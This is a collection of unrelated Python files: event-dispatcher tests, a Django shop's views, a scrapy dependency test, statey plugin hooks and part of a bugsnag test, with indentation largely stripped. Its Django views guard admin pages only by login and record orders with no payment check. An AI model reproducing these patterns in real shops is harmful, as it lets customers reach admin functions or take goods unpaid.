def capture(evt, **kw):
nonlocal cap_evts
cap_evts.append(evt)
recv.add_event_handler(self.evt_one, capture)
recv.dispatch_event(self.evt_child2, param1=False, param2=234, param5=567)
test_utils.run_briefly(self.loop)
        # only the most specific event (EvtChild2) should have been sent to the handler
self.assertEqual(1, len(cap_evts))
cap_evt = cap_evts[0]
self.assertIsInstance(cap_evt, self.evt_child2)
self.assertEqual(cap_evt.param5, 567)
def test_dispatch_parents_to_obj(self):
        # Dispatching a subclass event to an object should result in only
        # the most specific receiver being called.
        # EventReceiver listens to evt_child1, but not evt_child2, so it should
        # receive a notification there (and only there)
recv = EventReceiver(loop=self.loop)
recv.dispatch_event(self.evt_child2, param1=False, param2=234, param5=567)
test_utils.run_briefly(self.loop)
self.assertEqual(recv._result_evt_child1.__class__, self.evt_child2)
self.assertIsNone(recv._result_evt_one)
def test_dispatch_oneshot(self):
count = 0
@event.oneshot
def handler(evt, **kw):
nonlocal count
count += 1
recv = event.Dispatcher(loop=self.loop)
hnd = recv.add_event_handler(self.evt_one, handler)
self.assertTrue(hnd.oneshot)
# dispatch twice on the same loop run; should still only be called once
recv.dispatch_event(self.evt_one, param1=False, param2=123)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertEqual(count, 1)
def test_handler_disable_implicit(self):
count = 0
def handler(evt, **kw):
nonlocal count
count += 1
recv = event.Dispatcher(loop=self.loop)
hnd = recv.add_event_handler(self.evt_one, handler)
# call twice
recv.dispatch_event(self.evt_one, param1=False, param2=123)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
# should no longer be dispatched
hnd.disable()
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertEqual(count, 2)
def test_handler_disable_explicit(self):
count = 0
def handler(evt, **kw):
nonlocal count
count += 1
recv = event.Dispatcher(loop=self.loop)
hnd = recv.add_event_handler(self.evt_one, handler)
# call twice
recv.dispatch_event(self.evt_one, param1=False, param2=123)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
# should no longer be dispatched
recv.remove_event_handler(self.evt_one, hnd)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertEqual(count, 2)
def test_dispatch_to_children(self):
class Target(event.Dispatcher):
def __init__(self, **kw):
super().__init__(**kw)
self.count = 0
def recv_evt_one(self, *a, **kw):
self.count += 1
parent = Target(loop=self.loop)
child1 = Target(loop=self.loop)
child2 = Target(loop=self.loop)
other = Target(loop=self.loop)
parent._add_child_dispatcher(child1)
parent._add_child_dispatcher(child2)
parent.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertEqual(parent.count, 1)
self.assertEqual(child1.count, 1)
self.assertEqual(child2.count, 1)
self.assertEqual(other.count, 0)
def test_dispatch_child_loops(self):
# ensure that a child event handler cannot create a dispatch loop
parent = event.Dispatcher(loop=self.loop)
child = event.Dispatcher(loop=self.loop)
parent._add_child_dispatcher(child)
count = 0
def handler(evt, *a, **kw):
nonlocal count
count += 1
parent.dispatch_event(evt)
child.add_event_handler(self.evt_one, handler)
parent.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
# run loop twice to allow a second dispatched event to be delivered
# (or hopefully not)
test_utils.run_briefly(self.loop)
self.assertEqual(count, 1)
def test_dispatch_child_dupe(self):
# ensure that a child handler cannot redeliver an event to a sibling
# child object
parent = event.Dispatcher(loop=self.loop)
class Child(event.Dispatcher):
def __init__(self, **kw):
super().__init__(**kw)
self.count = 0
def recv_evt_one(self, evt, *a, **kw):
# attempt to deliver to the other child
self.count += 1
self.other_child.dispatch_event(evt)
child1 = Child(loop=self.loop)
child2 = Child(loop=self.loop)
child1.other_child = child2
child2.other_child = child1
parent._add_child_dispatcher(child1)
parent._add_child_dispatcher(child2)
parent.dispatch_event(self.evt_one, param1=False, param2=123)
for i in range(4):
test_utils.run_briefly(self.loop)
self.assertEqual(child1.count, 1)
self.assertEqual(child2.count, 1)
def test_stop_dispatcher(self):
count = 0
def handler(evt, *a, **kw):
nonlocal count
count += 1
recv = event.Dispatcher(loop=self.loop)
recv.add_event_handler(self.evt_one, handler)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
recv._stop_dispatcher()
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertEqual(count, 2)
def test_obj_abort_futures(self):
recv = event.Dispatcher(loop=self.loop)
fut1 = asyncio.Future(loop=self.loop)
fut2 = asyncio.Future(loop=self.loop)
fut3 = asyncio.Future(loop=self.loop)
fut3.set_result('result') # should not be aborted
exc = ValueError('test exception')
recv.add_event_handler(self.evt_one, fut1)
recv.add_event_handler(self.evt_one, fut2)
recv.add_event_handler(self.evt_one, fut3)
recv._abort_event_futures(exc)
self.assertTrue(fut1.done())
self.assertTrue(fut2.done())
self.assertEqual(fut1.exception(), exc)
self.assertEqual(fut2.exception(), exc)
        # the futures should have been removed
handlers = recv._dispatch_handlers['EvtOne']
self.assertEqual(len(handlers), 0)
def test_global_abort_futures(self):
        # check that the global _abort_futures call actually calls each
        # active dispatcher object's _abort_event_futures method.
        event.active_dispatchers.clear()
        # define a dispatcher subclass whose instances auto-register themselves
        class Target(event.Dispatcher):
            def _abort_event_futures(self, exc):
                self._abort_exc = exc
                super()._abort_event_futures(exc)
recv1 = Target(loop=self.loop)
recv2 = Target(loop=self.loop)
self.assertEqual(len(event.active_dispatchers), 2)
fut1 = asyncio.Future(loop=self.loop)
fut2 = asyncio.Future(loop=self.loop)
recv1.add_event_handler(self.evt_one, fut1)
recv2.add_event_handler(self.evt_one, fut2)
exc = ValueError('test exception')
event._abort_futures(exc)
self.assertTrue(fut1.done())
self.assertTrue(fut2.done())
self.assertEqual(fut1.exception(), exc)
self.assertEqual(fut2.exception(), exc)
def test_wait_for_first_with_discard1(self):
# test that uncompleted futures are cancelled
fut1 = asyncio.Future(loop=self.loop)
fut2 = asyncio.Future(loop=self.loop)
self.loop.call_soon(lambda: fut2.set_result("done"))
co = event.wait_for_first(fut1, fut2, loop=self.loop)
result = self.loop.run_until_complete(co)
self.assertEqual(result, "done")
self.assertTrue(fut1.cancelled())
def test_wait_for_first_with_discard2(self):
# test that racing completed futures are marked as done
class Fut(asyncio.Future):
def result(self):
self.result_called = True
return super().result()
fut1 = Fut(loop=self.loop)
fut2 = Fut(loop=self.loop)
self.loop.call_soon(lambda: fut2.set_result("done"))
self.loop.call_soon(lambda: fut1.set_result("done"))
co = event.wait_for_first(fut1, fut2, loop=self.loop)
result = self.loop.run_until_complete(co)
self.assertEqual(result, "done") # don't care which future
self.assertTrue(fut1.result_called)
self.assertTrue(fut2.result_called)
def test_wait_for_first_with_discard_exception(self):
        # test that racing futures, one of which completed with an exception,
        # are still all marked as done
class Fut(asyncio.Future):
def result(self):
self.result_called = True
return super().result()
fut1 = Fut(loop=self.loop)
fut2 = Fut(loop=self.loop)
self.loop.call_soon(lambda: fut2.set_result("done"))
        self.loop.call_soon(lambda: fut1.set_exception(ValueError("test exception")))
co = event.wait_for_first(fut1, fut2, loop=self.loop)
result = self.loop.run_until_complete(co)
self.assertEqual(result, "done") # must get result rather than exception
self.assertTrue(fut1.result_called)
self.assertTrue(fut2.result_called)
def test_wait_for_first_no_discard(self):
fut1 = asyncio.Future(loop=self.loop)
fut2 = asyncio.Future(loop=self.loop)
self.loop.call_soon(lambda: fut2.set_result("done"))
co = event.wait_for_first(fut1, fut2, discard_remaining=False, loop=self.loop)
result = self.loop.run_until_complete(co)
self.assertEqual(result, "done")
self.assertFalse(fut1.cancelled())
def test_wait_for_first_raise_exc(self):
# ensure raised exceptions are returned
fut1 = asyncio.Future(loop=self.loop)
fut2 = asyncio.Future(loop=self.loop)
class TestExc(Exception): pass
exc = TestExc('test exception')
self.loop.call_soon(lambda: fut2.set_exception(exc))
co = event.wait_for_first(fut1, fut2, loop=self.loop)
with self.assertRaises(TestExc):
result = self.loop.run_until_complete(co)
self.assertTrue(fut1.cancelled())
| avg_line_length: 37.004213 | max_line_length: 99 | alphanum_fraction: 0.640111 |

hexsha: 794db07ec015e21e366e867ac4e06628283c5bfb | size: 21,207 | ext: py | lang: Python
max_stars:  ecom/views.py | patrickikhidero/e-Market | 8a79959371ba47bbe22d3451d5b3076cefee86ef | ["MIT"] | count: null | events: null, null
max_issues: ecom/views.py | patrickikhidero/e-Market | 8a79959371ba47bbe22d3451d5b3076cefee86ef | ["MIT"] | count: null | events: null, null
max_forks:  ecom/views.py | patrickikhidero/e-Market | 8a79959371ba47bbe22d3451d5b3076cefee86ef | ["MIT"] | count: null | events: null, null
from django.shortcuts import render,redirect,reverse
from . import forms,models
from django.http import HttpResponseRedirect,HttpResponse
from django.core.mail import send_mail
from django.contrib.auth.models import Group
from django.contrib.auth.decorators import login_required,user_passes_test
from django.contrib import messages
from django.conf import settings
def home_view(request):
products=models.Product.objects.all()
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
counter=product_ids.split('|')
product_count_in_cart=len(set(counter))
else:
product_count_in_cart=0
if request.user.is_authenticated:
return HttpResponseRedirect('afterlogin')
return render(request,'ecom/index.html',{'products':products,'product_count_in_cart':product_count_in_cart})
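# Note on the cart cookie scheme used throughout this module: the ids of the
# products in the cart live in a single 'product_ids' cookie as a '|'-separated
# string (e.g. "3|5|3"), and the cart badge shows the number of distinct ids.
# A minimal sketch of the counting logic, which the views below inline rather
# than share (this helper name is ours, not part of the project):
def _count_cart_items(product_ids_cookie):
    # "3|5|3" -> {'3', '5'} -> 2; note that "".split('|') yields [''], which is
    # why the views check that the cookie exists and is non-empty first
    if not product_ids_cookie:
        return 0
    return len(set(product_ids_cookie.split('|')))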
# for showing the login button for admin (by Patoricode)
def adminclick_view(request):
if request.user.is_authenticated:
return HttpResponseRedirect('afterlogin')
return HttpResponseRedirect('adminlogin')
def customer_signup_view(request):
userForm=forms.CustomerUserForm()
customerForm=forms.CustomerForm()
mydict={'userForm':userForm,'customerForm':customerForm}
if request.method=='POST':
userForm=forms.CustomerUserForm(request.POST)
customerForm=forms.CustomerForm(request.POST,request.FILES)
if userForm.is_valid() and customerForm.is_valid():
user=userForm.save()
user.set_password(user.password)
user.save()
customer=customerForm.save(commit=False)
customer.user=user
customer.save()
my_customer_group = Group.objects.get_or_create(name='CUSTOMER')
my_customer_group[0].user_set.add(user)
return HttpResponseRedirect('customerlogin')
return render(request,'ecom/customersignup.html',context=mydict)
#----------- for checking whether the user is a customer
def is_customer(user):
return user.groups.filter(name='CUSTOMER').exists()
#--------- AFTER ENTERING CREDENTIALS, CHECK WHETHER THE USERNAME AND PASSWORD BELONG TO AN ADMIN OR A CUSTOMER
def afterlogin_view(request):
if is_customer(request.user):
return redirect('customer-home')
else:
return redirect('admin-dashboard')
#---------------------------------------------------------------------------------
#------------------------ ADMIN RELATED VIEWS START ------------------------------
#---------------------------------------------------------------------------------
@login_required(login_url='adminlogin')
def admin_dashboard_view(request):
# for cards on dashboard
customercount=models.Customer.objects.all().count()
productcount=models.Product.objects.all().count()
ordercount=models.Orders.objects.all().count()
# for recent order tables
orders=models.Orders.objects.all()
ordered_products=[]
ordered_bys=[]
for order in orders:
ordered_product=models.Product.objects.all().filter(id=order.product.id)
ordered_by=models.Customer.objects.all().filter(id = order.customer.id)
ordered_products.append(ordered_product)
ordered_bys.append(ordered_by)
mydict={
'customercount':customercount,
'productcount':productcount,
'ordercount':ordercount,
'data':zip(ordered_products,ordered_bys,orders),
}
return render(request,'ecom/admin_dashboard.html',context=mydict)
# admin view customer table
@login_required(login_url='adminlogin')
def view_customer_view(request):
customers=models.Customer.objects.all()
return render(request,'ecom/view_customer.html',{'customers':customers})
# admin delete customer
@login_required(login_url='adminlogin')
def delete_customer_view(request,pk):
customer=models.Customer.objects.get(id=pk)
user=models.User.objects.get(id=customer.user_id)
user.delete()
customer.delete()
return redirect('view-customer')
@login_required(login_url='adminlogin')
def update_customer_view(request,pk):
customer=models.Customer.objects.get(id=pk)
user=models.User.objects.get(id=customer.user_id)
userForm=forms.CustomerUserForm(instance=user)
    customerForm=forms.CustomerForm(instance=customer)
mydict={'userForm':userForm,'customerForm':customerForm}
if request.method=='POST':
userForm=forms.CustomerUserForm(request.POST,instance=user)
        customerForm=forms.CustomerForm(request.POST,request.FILES,instance=customer)
if userForm.is_valid() and customerForm.is_valid():
user=userForm.save()
user.set_password(user.password)
user.save()
customerForm.save()
return redirect('view-customer')
return render(request,'ecom/admin_update_customer.html',context=mydict)
# admin view the product
@login_required(login_url='adminlogin')
def admin_products_view(request):
products=models.Product.objects.all()
return render(request,'ecom/admin_products.html',{'products':products})
# admin add product by clicking on floating button
@login_required(login_url='adminlogin')
def admin_add_product_view(request):
productForm=forms.ProductForm()
if request.method=='POST':
productForm=forms.ProductForm(request.POST, request.FILES)
if productForm.is_valid():
productForm.save()
return HttpResponseRedirect('admin-products')
return render(request,'ecom/admin_add_products.html',{'productForm':productForm})
@login_required(login_url='adminlogin')
def delete_product_view(request,pk):
product=models.Product.objects.get(id=pk)
product.delete()
return redirect('admin-products')
@login_required(login_url='adminlogin')
def update_product_view(request,pk):
product=models.Product.objects.get(id=pk)
productForm=forms.ProductForm(instance=product)
if request.method=='POST':
productForm=forms.ProductForm(request.POST,request.FILES,instance=product)
if productForm.is_valid():
productForm.save()
return redirect('admin-products')
return render(request,'ecom/admin_update_product.html',{'productForm':productForm})
@login_required(login_url='adminlogin')
def admin_view_booking_view(request):
orders=models.Orders.objects.all()
ordered_products=[]
ordered_bys=[]
for order in orders:
ordered_product=models.Product.objects.all().filter(id=order.product.id)
ordered_by=models.Customer.objects.all().filter(id = order.customer.id)
ordered_products.append(ordered_product)
ordered_bys.append(ordered_by)
return render(request,'ecom/admin_view_booking.html',{'data':zip(ordered_products,ordered_bys,orders)})
@login_required(login_url='adminlogin')
def delete_order_view(request,pk):
order=models.Orders.objects.get(id=pk)
order.delete()
return redirect('admin-view-booking')
# for changing status of order (pending,delivered...)
@login_required(login_url='adminlogin')
def update_order_view(request,pk):
order=models.Orders.objects.get(id=pk)
orderForm=forms.OrderForm(instance=order)
if request.method=='POST':
orderForm=forms.OrderForm(request.POST,instance=order)
if orderForm.is_valid():
orderForm.save()
return redirect('admin-view-booking')
return render(request,'ecom/update_order.html',{'orderForm':orderForm})
# admin view the feedback
@login_required(login_url='adminlogin')
def view_feedback_view(request):
feedbacks=models.Feedback.objects.all().order_by('-id')
return render(request,'ecom/view_feedback.html',{'feedbacks':feedbacks})
#---------------------------------------------------------------------------------
#------------------------ PUBLIC CUSTOMER RELATED VIEWS START ---------------------
#---------------------------------------------------------------------------------
def search_view(request):
    # whatever the user types in the search box arrives here as 'query'
query = request.GET['query']
products=models.Product.objects.all().filter(name__icontains=query)
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
counter=product_ids.split('|')
product_count_in_cart=len(set(counter))
else:
product_count_in_cart=0
    # the 'word' variable is shown in the HTML when the user clicks the search button
word="Searched Result :"
if request.user.is_authenticated:
return render(request,'ecom/customer_home.html',{'products':products,'word':word,'product_count_in_cart':product_count_in_cart})
return render(request,'ecom/index.html',{'products':products,'word':word,'product_count_in_cart':product_count_in_cart})
# anyone can add a product to the cart; no sign-in needed
def add_to_cart_view(request,pk):
products=models.Product.objects.all()
    # for the cart counter: fetch the product ids the customer added from cookies
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
counter=product_ids.split('|')
product_count_in_cart=len(set(counter))
else:
product_count_in_cart=1
response = render(request, 'ecom/index.html',{'products':products,'product_count_in_cart':product_count_in_cart})
#adding product id to cookies
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
if product_ids=="":
product_ids=str(pk)
else:
product_ids=product_ids+"|"+str(pk)
response.set_cookie('product_ids', product_ids)
else:
response.set_cookie('product_ids', pk)
product=models.Product.objects.get(id=pk)
messages.info(request, product.name + ' added to cart successfully!')
return response
# for checkout of cart
def cart_view(request):
#for cart counter
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
counter=product_ids.split('|')
product_count_in_cart=len(set(counter))
else:
product_count_in_cart=0
    # fetch details of the products whose ids are present in the cookie
products=None
total=0
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
if product_ids != "":
product_id_in_cart=product_ids.split('|')
products=models.Product.objects.all().filter(id__in = product_id_in_cart)
#for total price shown in cart
for p in products:
total=total+p.price
return render(request,'ecom/cart.html',{'products':products,'total':total,'product_count_in_cart':product_count_in_cart})
def remove_from_cart_view(request,pk):
#for counter in cart
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
counter=product_ids.split('|')
product_count_in_cart=len(set(counter))
else:
product_count_in_cart=0
# removing product id from cookie
total=0
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
product_id_in_cart=product_ids.split('|')
product_id_in_cart=list(set(product_id_in_cart))
product_id_in_cart.remove(str(pk))
products=models.Product.objects.all().filter(id__in = product_id_in_cart)
#for total price shown in cart after removing product
for p in products:
total=total+p.price
        # update the cookie value after removing a product id from the cart
value=""
for i in range(len(product_id_in_cart)):
if i==0:
value=value+product_id_in_cart[0]
else:
value=value+"|"+product_id_in_cart[i]
response = render(request, 'ecom/cart.html',{'products':products,'total':total,'product_count_in_cart':product_count_in_cart})
    if value=="":
        response.delete_cookie('product_ids')
    else:
        response.set_cookie('product_ids',value)
return response
def send_feedback_view(request):
feedbackForm=forms.FeedbackForm()
if request.method == 'POST':
feedbackForm = forms.FeedbackForm(request.POST)
if feedbackForm.is_valid():
feedbackForm.save()
return render(request, 'ecom/feedback_sent.html')
return render(request, 'ecom/send_feedback.html', {'feedbackForm':feedbackForm})
#---------------------------------------------------------------------------------
#------------------------ CUSTOMER RELATED VIEWS START ------------------------------
#---------------------------------------------------------------------------------
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def customer_home_view(request):
products=models.Product.objects.all()
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
counter=product_ids.split('|')
product_count_in_cart=len(set(counter))
else:
product_count_in_cart=0
return render(request,'ecom/customer_home.html',{'products':products,'product_count_in_cart':product_count_in_cart})
# shipment address before placing order
@login_required(login_url='customerlogin')
def customer_address_view(request):
    # check whether any product is present in the cart;
    # if the cart is empty we will not show the address form
product_in_cart=False
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
if product_ids != "":
product_in_cart=True
#for counter in cart
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
counter=product_ids.split('|')
product_count_in_cart=len(set(counter))
else:
product_count_in_cart=0
addressForm = forms.AddressForm()
if request.method == 'POST':
addressForm = forms.AddressForm(request.POST)
if addressForm.is_valid():
            # here we take the address, email and mobile at the time of order
            # placement; we do not take them from the customer account table
            # because these things can change
email = addressForm.cleaned_data['Email']
mobile=addressForm.cleaned_data['Mobile']
address = addressForm.cleaned_data['Address']
            # for showing the total price on the payment page: read product ids from cookies, then fetch prices from the db
total=0
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
if product_ids != "":
product_id_in_cart=product_ids.split('|')
products=models.Product.objects.all().filter(id__in = product_id_in_cart)
for p in products:
total=total+p.price
response = render(request, 'ecom/payment.html',{'total':total})
response.set_cookie('email',email)
response.set_cookie('mobile',mobile)
response.set_cookie('address',address)
return response
return render(request,'ecom/customer_address.html',{'addressForm':addressForm,'product_in_cart':product_in_cart,'product_count_in_cart':product_count_in_cart})
# here we simply redirect to this view; in a real flow we must check whether
# the payment succeeded, and only then allow this view to be accessed
@login_required(login_url='customerlogin')
def payment_success_view(request):
    # After a successful payment we place the order:
    # fetch the customer's mobile, address and email,
    # fetch the product ids from cookies and their details from the db,
    # create the order objects and store them in the db,
    # and finally delete the cookies, since the cart should be empty once the order is placed
customer=models.Customer.objects.get(user_id=request.user.id)
products=None
email=None
mobile=None
address=None
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
if product_ids != "":
product_id_in_cart=product_ids.split('|')
products=models.Product.objects.all().filter(id__in = product_id_in_cart)
    # Here we get the list of products that this customer is ordering.
    # These details can change, so we read them at order time...
if 'email' in request.COOKIES:
email=request.COOKIES['email']
if 'mobile' in request.COOKIES:
mobile=request.COOKIES['mobile']
if 'address' in request.COOKIES:
address=request.COOKIES['address']
    # we place one order per product:
    # if there are 5 items in the cart, placing the order creates 5 rows in the orders table.
    # this leaves redundant data in the orders table, but normalizing it would complicate the code
for product in products:
models.Orders.objects.get_or_create(customer=customer,product=product,status='Pending',email=email,mobile=mobile,address=address)
    # after the order is placed the cookies should be deleted
response = render(request,'ecom/payment_success.html')
response.delete_cookie('product_ids')
response.delete_cookie('email')
response.delete_cookie('mobile')
response.delete_cookie('address')
return response
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def my_order_view(request):
customer=models.Customer.objects.get(user_id=request.user.id)
orders=models.Orders.objects.all().filter(customer_id = customer)
ordered_products=[]
for order in orders:
ordered_product=models.Product.objects.all().filter(id=order.product.id)
ordered_products.append(ordered_product)
return render(request,'ecom/my_order.html',{'data':zip(ordered_products,orders)})
#-------------- for invoice (pdf) download and printing
import io
from xhtml2pdf import pisa
from django.template.loader import get_template
def render_to_pdf(template_src, context_dict):
template = get_template(template_src)
html = template.render(context_dict)
result = io.BytesIO()
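    # Note: encoding the rendered HTML as ISO-8859-1 will raise
    # UnicodeEncodeError for any character outside Latin-1; UTF-8 would be the
    # safer choice if templates can contain such text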
pdf = pisa.pisaDocument(io.BytesIO(html.encode("ISO-8859-1")), result)
    if not pdf.err:
        return HttpResponse(result.getvalue(), content_type='application/pdf')
    # returning None would make Django raise; surface the failure explicitly
    return HttpResponse('Error while generating the PDF', status=500)
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def download_invoice_view(request,orderID,productID):
order=models.Orders.objects.get(id=orderID)
product=models.Product.objects.get(id=productID)
mydict={
'orderDate':order.order_date,
'customerName':request.user,
'customerEmail':order.email,
'customerMobile':order.mobile,
'shipmentAddress':order.address,
'orderStatus':order.status,
'productName':product.name,
'productImage':product.product_image,
'productPrice':product.price,
'productDescription':product.description,
}
return render_to_pdf('ecom/download_invoice.html',mydict)
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def my_profile_view(request):
customer=models.Customer.objects.get(user_id=request.user.id)
return render(request,'ecom/my_profile.html',{'customer':customer})
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def edit_profile_view(request):
customer=models.Customer.objects.get(user_id=request.user.id)
user=models.User.objects.get(id=customer.user_id)
userForm=forms.CustomerUserForm(instance=user)
    customerForm=forms.CustomerForm(instance=customer)
mydict={'userForm':userForm,'customerForm':customerForm}
if request.method=='POST':
userForm=forms.CustomerUserForm(request.POST,instance=user)
        customerForm=forms.CustomerForm(request.POST,request.FILES,instance=customer)
if userForm.is_valid() and customerForm.is_valid():
user=userForm.save()
user.set_password(user.password)
user.save()
customerForm.save()
return HttpResponseRedirect('my-profile')
return render(request,'ecom/edit_profile.html',context=mydict)
#---------------------------------------------------------------------------------
#------------------------ ABOUT US AND CONTACT US VIEWS START --------------------
#---------------------------------------------------------------------------------
def aboutus_view(request):
return render(request,'ecom/aboutus.html')
def contactus_view(request):
sub = forms.ContactusForm()
if request.method == 'POST':
sub = forms.ContactusForm(request.POST)
if sub.is_valid():
email = sub.cleaned_data['Email']
name=sub.cleaned_data['Name']
message = sub.cleaned_data['Message']
send_mail(str(name)+' || '+str(email),message, settings.EMAIL_HOST_USER, settings.EMAIL_RECEIVING_USER, fail_silently = False)
return render(request, 'ecom/contactussuccess.html')
return render(request, 'ecom/contactus.html', {'form':sub})
| avg_line_length: 39.127306 | max_line_length: 163 | alphanum_fraction: 0.67888 |

hexsha: 794db0fe6fb178ab6e2d585276abe653e29bed3d | size: 541 | ext: py | lang: Python
max_stars:  scrapy/tests/test_dependencies.py | kamendula/scrapy | bd79b6e1d3e13344b98c268ac738d4b0ed9a1ce1 | ["BSD-3-Clause"] | count: 1 | events: 2015-04-23T15:02:58.000Z, 2015-04-23T15:02:58.000Z
max_issues: scrapy/tests/test_dependencies.py | KDOTGIS/scrapy | fa245af6d24c9bf87b00419b7ffb6a483baba199 | ["BSD-3-Clause"] | count: null | events: null, null
max_forks:  scrapy/tests/test_dependencies.py | KDOTGIS/scrapy | fa245af6d24c9bf87b00419b7ffb6a483baba199 | ["BSD-3-Clause"] | count: null | events: null, null
from twisted.trial import unittest
class ScrapyUtilsTest(unittest.TestCase):
def test_required_openssl_version(self):
try:
module = __import__('OpenSSL', {}, {}, [''])
        except ImportError:
raise unittest.SkipTest("OpenSSL is not available")
if hasattr(module, '__version__'):
installed_version = [int(x) for x in module.__version__.split('.')[:2]]
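            # e.g. '0.13.1' -> [0, 13]; Python compares lists element-wise, so
            # [0, 13] >= [0, 6] holds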
assert installed_version >= [0, 6], "OpenSSL >= 0.6 required"
if __name__ == "__main__":
unittest.main()
| avg_line_length: 33.8125 | max_line_length: 83 | alphanum_fraction: 0.626617 |

hexsha: 794db15560c8ef600c23007274a1ef06f3eff191 | size: 3,172 | ext: py | lang: Python
max_stars:  statey/hooks.py | cfeenstra67/statey | 6d127ed48265e2e072fbb26486458a4b28a333ec | ["MIT"] | count: 4 | events: 2021-02-16T19:34:38.000Z, 2022-01-31T16:44:14.000Z
max_issues: statey/hooks.py | cfeenstra67/statey | 6d127ed48265e2e072fbb26486458a4b28a333ec | ["MIT"] | count: null | events: null, null
max_forks:  statey/hooks.py | cfeenstra67/statey | 6d127ed48265e2e072fbb26486458a4b28a333ec | ["MIT"] | count: null | events: null, null
from typing import Optional
import pluggy
from statey import NS
hookspec = pluggy.HookspecMarker(NS)
hookimpl = pluggy.HookimplMarker(NS)
def create_plugin_manager() -> pluggy.PluginManager:
"""
Factory function to create a plugin manager w/ the default namespace
"""
return pluggy.PluginManager(NS)
def register_default_plugins(
registry: Optional["Registry"] = None,
encoders: bool = True,
type_plugins: bool = True,
semantics: bool = True,
type_serializers: bool = True,
providers: bool = True,
extensions: bool = True,
differs: bool = True,
methods: bool = True,
casters: bool = True,
impl_serializers: bool = True,
object_serializers: bool = True,
namespace_serializers: bool = True,
session_serializers: bool = True,
state_managers: bool = True,
setuptools_entrypoints: bool = True,
) -> None:
"""
Convenience method to register all of the default provided hooks for the given
object types
"""
if registry is None:
from statey import registry
if encoders:
from statey.syms.encoders import register as register_encoders
register_encoders(registry)
if type_plugins:
from statey.syms.plugins import register as register_type_plugins
register_type_plugins(registry)
if semantics:
from statey.syms.semantics import register as register_semantics
register_semantics(registry)
if type_serializers:
from statey.syms.type_serializers import register as register_serializers
register_serializers(registry)
if differs:
from statey.syms.diff import register as register_differs
register_differs(registry)
if casters:
from statey.syms.casters import register as register_casters
register_casters(registry)
if methods:
from statey.syms.methods import register as register_methods
register_methods(registry)
if impl_serializers:
from statey.syms.impl_serializers import register as register_impl_serializers
register_impl_serializers(registry)
if object_serializers:
from statey.syms.object_serializers import (
register as register_object_serializers,
)
register_object_serializers(registry)
if namespace_serializers:
from statey.syms.namespace_serializers import (
register as register_ns_serializers,
)
register_ns_serializers(registry)
if session_serializers:
from statey.syms.session_serializers import (
register as register_session_serializers,
)
register_session_serializers(registry)
if providers:
from statey.provider import register as register_providers
register_providers(registry)
if extensions:
from statey.ext import register as register_extensions
register_extensions(registry)
if state_managers:
from statey.state_manager import register as register_state_managers
register_state_managers(registry)
if setuptools_entrypoints:
registry.load_setuptools_entrypoints()
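# A minimal usage sketch (our assumption of typical wiring, not a documented
# statey entry point): create a fresh manager and register the default plugin
# groups, skipping setuptools entrypoint scanning for a hermetic environment.
#
#     import statey
#     pm = create_plugin_manager()
#     register_default_plugins(statey.registry, setuptools_entrypoints=False)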
| avg_line_length: 25.788618 | max_line_length: 86 | alphanum_fraction: 0.70681 |

hexsha: 794db2220704cf1bbb75a99b3efef99da6b82704 | size: 3,247 | ext: py | lang: Python
max_stars:  tests/test_path_encoding.py | ForroKulcs/bugsnag-python | 107c1add31a2202cc08ef944aa00ab96996b247a | ["MIT"] | count: 76 | events: 2015-03-01T11:46:57.000Z, 2022-02-18T10:57:44.000Z
max_issues: tests/test_path_encoding.py | ForroKulcs/bugsnag-python | 107c1add31a2202cc08ef944aa00ab96996b247a | ["MIT"] | count: 119 | events: 2015-01-14T11:53:08.000Z, 2022-03-30T08:22:50.000Z
max_forks:  tests/test_path_encoding.py | ForroKulcs/bugsnag-python | 107c1add31a2202cc08ef944aa00ab96996b247a | ["MIT"] | count: 46 | events: 2015-02-09T23:50:57.000Z, 2022-01-06T16:04:40.000Z
# coding=utf-8
import unittest
from urllib.parse import quote
from bugsnag.event import Event
from bugsnag.configuration import (Configuration, RequestConfiguration)
class PathEncodingTest(unittest.TestCase):
environ = {
'SCRIPT_NAME': '',
'SERVER_NAME': 'localhost',
'SERVER_PORT': '80',
'wsgi.url_scheme': 'http',
}
def test_path_supports_ascii_characters(self):
import bugsnag.wsgi.middleware
environ = self.environ.copy()
environ['PATH_INFO'] = '/hello/world'
bugsnag.configure_request(wsgi_environ=environ)
config = Configuration()
event = Event(
Exception("oops"),
config,
RequestConfiguration.get_instance()
)
bugsnag.wsgi.middleware.add_wsgi_request_data_to_notification(
event
)
self.assertEqual(
'http://localhost/hello/world',
event.metadata['request']['url']
)
def test_wrongly_encoded_url_should_not_raise(self):
import bugsnag.wsgi.middleware
environ = self.environ.copy()
environ['PATH_INFO'] = '/%83'
bugsnag.configure_request(wsgi_environ=environ)
config = Configuration()
event = Event(
Exception("oops"),
config,
RequestConfiguration.get_instance()
)
